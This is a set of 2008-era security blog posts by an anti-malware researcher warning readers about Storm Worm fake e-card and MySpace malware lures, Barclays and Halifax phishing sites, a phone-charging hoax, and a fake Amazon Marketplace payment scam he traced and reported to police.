If you see any other interesting new tricks/techniques or file formats being used by spammers then please feel free to send me the details or post the information as a comment. Thanks!

Paper Selected For The EICAR 2008 Conference

EICAR have informed me that my abstract has been selected for the EICAR 2008 conference to be held in Laval, France between the 3rd and the 6th of May.

The abstract for the paper appears below:

The increasing speed of new malware strains being written and released means that security professionals are more likely than ever before to see new malware.

This means new malware which is not detected by the anti-malware solutions they have deployed in their infrastructure, be it workstation, server, PDA or at the gateway.

Imagine this scenario: An end-user calls the helpdesk and reports that their system is running very sluggishly when it wasn't a week ago and that they can't access the Windows 'Task Manager' or open a command prompt any more.

Is this caused by malware or is it a 'user' problem? The virus scanner is right up to date and active, and it says the system is clean, the personal firewall is active too. Where do you go from here? Investigate or rebuild the box?

How can you tell if the machine is clean or infected by a new malware, with a reasonable level of confidence for your conclusion?

This paper will look at what tricks, tools and techniques you can use to help establish the true state of the 'suspect' system. It will focus on a step by step approach of what tools to use, what to look for and what to do with any suspicious files. It will also discuss the use of forensic tools in such a scenario, as a last port of call.

The paper will draw on real scenarios where new [undetected] malware has been responsible for 'odd' system or network behaviour.

All I have to do now, is carry out all the required research and write the paper; should only take me about 3 months. However, as usual they need the completed paper by the 17th of March!

I've several other ideas for abstracts already sketched out ready for to submit for this years Virus Bulletin conference. Any topics that you think should be covered are most welcome, just drop me a note or leave a comment.

A Shocking Mobile Call...

I often receive e-mails from people who are either, just forwarding the latest chain mail, urban legend, hoax or scam e-mail, or they send them to me to ask my opinion as I have seen many of these types of e-mails over the last 15 years and can usually spot the real ones from the fake ones very quickly.

So, yesterday I was sent the following in an e-mail by someone asking me if it was a hoax or not?:



What do you think, real or hoax?

Before I give you my answer, I would like to bring to your attention the following data:

• Most phones use power adapters that step down the voltage from standard mains [usually in the range of 110-240 Volts] to significantly lower [usually in the range of 3-12 Volts], not only that these power adapters usually have very low ampage [a quick look at several of the ones I have on hand shows that 200ma is fairly typical].



• There have been a number of reports of exploding mobile phones [well actually batteries] over the last few years.



• Most phone manufacturer instruction manuals contain information which state that it is perfectly safe to use a mobile phone while it is being recharged.

My conclusion is that if this did happen then the phone and/or the power adapter were faulty or damaged and that this caused the effect allegedly witnessed, either that of the building that the person was in at the time suffered from a lightning strike which fed into the mains circuit. However, no such data is supplied and therefore it is almost impossible to corroborate or give any credence to this report. I therefore conclude that it is a hoax.

If you still think it is real and not a hoax, then I'd suggest you read the full debunk which can be found here:
http://www.snopes.com/horrors/techno/cellcharge.asp

From Storm With Love...

It seems that the Storm Worm Gang have decided that you all need some loving, so they are now sending out fake e-card e-mail notifications informing you how much they love you, because you make their job of building botnets so easy ;-)

Either that or their calendar is screwed up again; they almost missed Christmas and were then very early for New Year!

Here's a screenshot of what just one of these new With Love based emails look like:



The body text can be one of a number of text strings. The rest of the e-mail is usually a link, this time they have gone back to using IP addresses rather than actual domain names, not sure why? The IP addresses used are varied, so don't just think that they use just the one shown in the example here.

Of course, when you click on the link you go to a very nice, but fake e-card site.

Here is a screenshot of the web page you could end up on if you click on the link in one of these fake With Love themed e-mails.



Here's a screenshot showing the HTML source for the page, does it look familiar? It should as this is almost exactly the same code used during the New Year campaign.



The message shown is fake, the 'withlove.exe' file offered isn't an ecard offering words of love from an admirer, partner or colleague, in other words, if you are unwise enough to download the file and run it you won't get to see an ecard, in fact you will get a bot installed instead and your computer will join one of the many Storm Worm botnets.

At the time of publishing this entry detection was almost non-existent, with most of the top anti-virus products not detecting the malware laden file as infected, you have been warned.

As mentioned before, please do not go to these sites and download the files offered, as they are real, live, malware.

More details on the file currently being offered can be found here on my VSUB blog, complete with detection results at the time of publishing.

MySpace Storm...

It seems that the Storm Worm Gang have finally changed their social engineering tactic from the New Year e-cards that we have been seeing since the 26th of December until the 2nd of January when they sent out their last new version of that particular tactic!

So, what are they now using to get you to infect your computer? They are using fake MySpace invite e-mails which contain links to phishing quality fake MySpace websites.

This seems rather spooky as I was blogging about social network engineering on the 4th of January!

Here's a screenshot of what just one of these new MySpace based emails look like:





The body text can be one of a number of fake names and text strings. The rest of the e-mail including the links appear to be fairly static, at the moment, anyway. Once more the link is an actual domain name, rather than the more usual IP address based links that the Storm Worm gang used to use.

Of course, when you click on the link you go to a very professional, but fake MySpace site.

Here is a screenshot of the web page you could end up on if you click on the link in one of these fake MySpace themed e-mails.



In fact there are several links in the e-mail which take you to different domain names, all under the control of the Storm Worm gang.

Here's another example showing another domain name in use.



The message shown is fake, the 'install_flash_player.exe' file offered isn't genuine, in other words, if you are unwise enough to download the file and run it you won't get a copy of Flash Player installed, in fact you will get a bot installed instead and your computer will join one of the many Storm Worm botnets.

Just to make it crystal clear, the file offered on this site will NOT install or update Flash Player; All that will happen is that your computer will be infected and turned in to a zombie [bot infected computer that is part of a botnet], if it is not protected by any mitigating technologies, such as up-to-date anti-virus, and so on.

At the time of publishing this entry detection was still very patchy, with a number of the top anti-virus products not detecting the malware laden file as infected, you have been warned.

As mentioned before, please do not go to these sites and download the files offered, as they are real, live, malware.

More details on the file currently being offered can be found here on my VSUB blog, complete with detection results at the time of publishing.

No doubt I'll be updating this post in the next day or so, as the Bad Guys and Girls tinker with their latest social engineering technique, or they change it to a new one...

As I post this I have now received over FIFTY of the fake MySpace invite e-mails!

New Year Phishes?

As a customer of Barclays Bank in the UK, I do occasionally receive e-mails from them, so I wasn't that surprised, or unduly alarmed when I received the e-mail shown in the screenshot below:



A quick look at it had my Phish Sense tingling, can you see why?

However, as usual I decided to take a look at the URL in the e-mail in more detail, as it was pretty believable, this is what I found:



This could easily be the real Barclays Bank site, it is very well done and very believable. In fact all the links, bar one, on the web page actually do go to the real Barclays web site. So, what happens if you enter data in the page and click on the Next button, where do you go next?

The next page shown is:



You are then prompted for the rest of your personal login details for Barclays. However, once filled in and having clicked on the Login button, you will end up on the real Barclays site, so this Phish, because that is what it is, no matter how good or believable it appears, is actually carrying out a Man-In-The-Middle attack by harvesting your real login data for your Barclay's internet banking account.

Last night I also started to see a similar attack aimed at the Halifax, here's a screenshot of the e-mail:



And here is the website the link takes you to:



This one uses the same technique, although it appears that not only is the page harvesting your Halifax credentials it also goes on to pass them to the real Halifax site, and so, if the data you gave was genuine, it should have logged you in, and you probably would be none the wiser that you have become the latest victim of a phishing attack.

If you put in fake data in the fake Halifax login page (shown above), the real Halifax site will show you an error message.

If you use an e-mail client that doesn't show you the bracketed e-mail address, then it is not surprising that customers of these banks, using these e-mail clients, actually fall for these latest phishing scams with disasterous results ranging from transferred funds, new loans or mortgages taken out in their name,to their whole identity being stolen.

Did you notice that the links in the e-mail claim to be HTTPS [SSL encrypted link to the website], when in fact they end up on a standard HTTP link which is NOT encrypted, so all data you enter is in CLEAR TEXT.

Please note: Do NOT go to the sites shown as they are real live phishing sites. You have been warned! Stay safe...

Whatever you do, don't take this threat lightly, as TV presenter and motor-mouth Jeremy Clarkson did after dismissing the threat of identity theft; he foolishly published his bank details and clues to other personal details in his column in The Sun newspaper. More details on this can be found here.

Amazon Adventures - Part Deux

Finally, here is the much promised second part of my recent Amazon Adventures. I warn you now, this is going to be a long post, you have been warned! ;-)

Part one can be found here.

This part is going to cover my recent adventures when trying to sell some things which were excess to requirements using the Amazon.co.uk Marketplace, which works a bit like eBay, but without scammers and con artists popping out of the woodwork every few seconds; or so I thought. How wrong I was to believe things would be any better on Amazon.co.uk's Marketplace than eBay.

The tale unfolds below:

So, as I mentioned above I had some electronic and other goods that were excess to requirements, these were in immaculate [almost new] condition as I had treated them with respect and care at all times. So, I created a Marketplace account on the Amazon.co.uk site so that I could offer these items for sale. This step was dead easy and I had a Marketplace shop open on Amazon.co.uk within five minutes. I confirmed this by searching for one of the items on Amazon.co.uk and it appeared [along with my Marketplace seller account name] in the new and used listings.

A few hours passed and I started to receive e-mails from prospective buyers of the most expensive of the electrical items I was trying to sell, here's a screenshot of one of the e-mails:



I replied promptly and gave the prospective buyer the benefit of the doubt, even though alarm bells were already starting to go off in my head. The next morning I received the following e-mail from 'Vannessa' [screenshot below]:



Hmmm.... I thought that is most interesting, especially as I had also received another e-mail which claimed to come from Amazon.co.uk payments e-mail address, or did it? Here's a screenshot of the e-mail below, notice anything odd?:





Looks real doesn't it, but is it really from Amazon or not, yes or no? [Hint look at the e-mail address shown between the '<' and '>' characters.

Anyway, even though by now I knew it wasn't really from Amazon.co.uk as the real e-mail address it came from was 'amazoncustoms@accountant.com', which is a FREE e-mail account from 'Mail.com' in the US. I decided to check my account on Amazon.co.uk Marketplace, and as expected the item was still listed as being available, not sold. At this point I decided to do a little more detective work.

So, to start my digging, I did a lookup on the UK Post Code given by the 'buyer', this being 'BL2 1LW' which resolved as the following address:

13 ST AUBINS ROAD
BOLTON
LANCASHIRE

Now, if you noticed the 'buyer' claimed her address was '13 st aubin road', notice not only the lower case, but also the missing 's' off the end of 'aubin'. By now I was fully convinced that this was a scammer trying to defraud me of my electronic device. So, I replied to her, see the screenshot below:



And 'Vanessa' replied thus:



In between the various e-mails, I did a bit more digging and found out that the address was the registered office for a company which has now been 'dissolved'. So, to turn the screw a little tighter I sent a reply which you can see below:



And 'Vanessa' replied thus:



And thus, about 15 minutes later
:


By now I think that 'Vanessa' knew that I had rumbled that this was a scam, or that she was getting desperate, so to try and string her along a little longer and see if I could extract a telephone number from 'her'. Here's the e-mail I sent:



I never expected to hear anything more from 'Vanessa', so I was rather surprised when I got the following reply:



Those of you that live in or know the phone number system in the UK will have immediately noticed that the phone number I had been given, was not in Bolton, or indeed anywhere near there. It was in fact a London telephone number, and a quick bit of digging unearthed the fact that it was a BT Pay Phone! Game, Set and Match to me, I think.

Further digging, seemed to indicate that the phone was on the West side of Lambeth Bridge, in Horseferry Road, which ironically, is less than 300m from New Scotland Yard!

My next move was to send all the data onto the fraud department of the London Metropolitan Police, as far as I was concerned, my job was now done, it was now down to the Police to apprehend the fraudster(s).

Over the next week, I received four other similar fake Amazon payments notices, needless to say, I played them along the same way and then sent the data onto the authorities to act on[*]. However, I'm not holding my breath, as these frauds are small fry in a world of sharks.

Needless to say, I finally decided that using Amazon.co.uk's Marketplace was not a good way to sell expensive electronic items, in fact I'd go as far as to say that it is only marginally better than eBay in this respect. I must make it clear that my comments are only about my personal experience of using the Marketplace feature of Amazon.co.uk, I have found all my other dealings with Amazon.co.uk to be safe and reliable and I generally trust them far more than other online stores. In fact they are one of the stores I use the most when I'm thinking of buying things, be it CDs, Books, Electronic Items or whatever.

[*] I also e-mailed and spoke to Amazon.co.uk's fraud team a number of times while these adventures unfolded, they were polite and efficient, but I was left feeling that they were not at all surprised about this level of fraud on their site, and seemed to have no answer to the problem. The problem seems to be worse when selling high value electronic items, such as phones, pdas or game consoles.